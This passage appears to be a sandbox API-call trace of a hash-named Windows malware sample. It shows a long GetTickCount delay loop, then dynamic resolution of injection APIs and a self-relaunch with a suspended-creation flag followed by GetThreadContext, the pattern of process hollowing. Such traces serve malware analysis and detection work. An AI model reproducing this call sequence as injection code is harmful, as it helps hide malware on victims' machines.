(dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.654] GetTickCount () returned 0xf6dece [0049.654] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.655] GetTickCount () returned 0xf6dece [0049.655] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.656] GetTickCount () returned 0xf6dece [0049.656] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.657] SetLastError (dwErrCode=0x0) [0049.657] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.658] GetTickCount () returned 0xf6dede [0049.658] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetTickCount () returned 0xf6dede [0049.659] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.661] GetTickCount () returned 0xf6dede [0049.661] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.662] GetTickCount () returned 0xf6dede [0049.662] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.663] SetLastError (dwErrCode=0x0) [0049.663] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.664] GetTickCount () returned 0xf6dede [0049.664] SetLastError (dwErrCode=0x0) [0049.715] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0049.715] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0049.715] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0049.715] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0049.715] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0049.715] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0049.715] GetProcAddress (hModule=0x769b0000, lpProcName="Module32First") returned 0x76a46279 [0049.715] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0049.715] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x30 [0049.718] Module32First (hSnapshot=0x30, lpme=0x18c410) returned 1 [0049.719] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x20000 [0049.723] LoadLibraryA (lpLibFileName="user32") returned 0x773b0000 [0055.848] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0055.848] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageExtraInfo") returned 0x773eed76 [0055.848] LoadLibraryA (lpLibFileName="kernel32") returned 0x769b0000 [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="WinExec") returned 0x76a43051 [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadContext") returned 0x769e799c [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAllocEx") returned 0x769dd980 [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0055.848] GetProcAddress (hModule=0x769b0000, lpProcName="ReadProcessMemory") returned 0x769dcfa4 [0055.849] GetProcAddress (hModule=0x769b0000, lpProcName="WriteProcessMemory") returned 0x769dd9b0 [0055.849] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadContext") returned 0x76a45933 [0055.849] GetProcAddress (hModule=0x769b0000, lpProcName="ResumeThread") returned 0x769c43a7 [0055.849] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0055.849] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0055.849] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0055.849] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0055.849] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0055.849] GetProcAddress (hModule=0x779e0000, lpProcName="NtWriteVirtualMemory") returned 0x779ffe04 [0055.849] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassExA") returned 0x773cdb98 [0055.849] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0055.849] GetProcAddress (hModule=0x773b0000, lpProcName="PostMessageA") returned 0x773d3baa [0055.850] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0055.850] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0055.850] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0055.850] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0055.850] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtectEx") returned 0x76a44b5f [0055.850] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0055.850] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0055.851] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0055.851] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0055.851] RegisterClassExA (param_1=0x18c0cc) returned 0x34c1bb [0055.851] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x3014a [0056.598] PostMessageA (hWnd=0x3014a, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0056.598] GetMessageA (in: lpMsg=0x18c0fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18c0fc) returned 1 [0056.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0056.599] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x220000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe")) returned 0x5f [0056.599] GetStartupInfoA (in: lpStartupInfo=0x18c020 | out: lpStartupInfo=0x18c020*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0056.599] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe\" " [0056.600] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18c020*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18c078 | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe\" ", lpProcessInformation=0x18c078*(hProcess=0x78, hThread=0x74, dwProcessId=0xe24, dwThreadId=0xe28)) returned 1 [0056.610] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.611] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0056.611] GetThreadContext (in: hThread=0x74, lpContext=0x220000 | out: lpContext=0x220000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424a10, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, 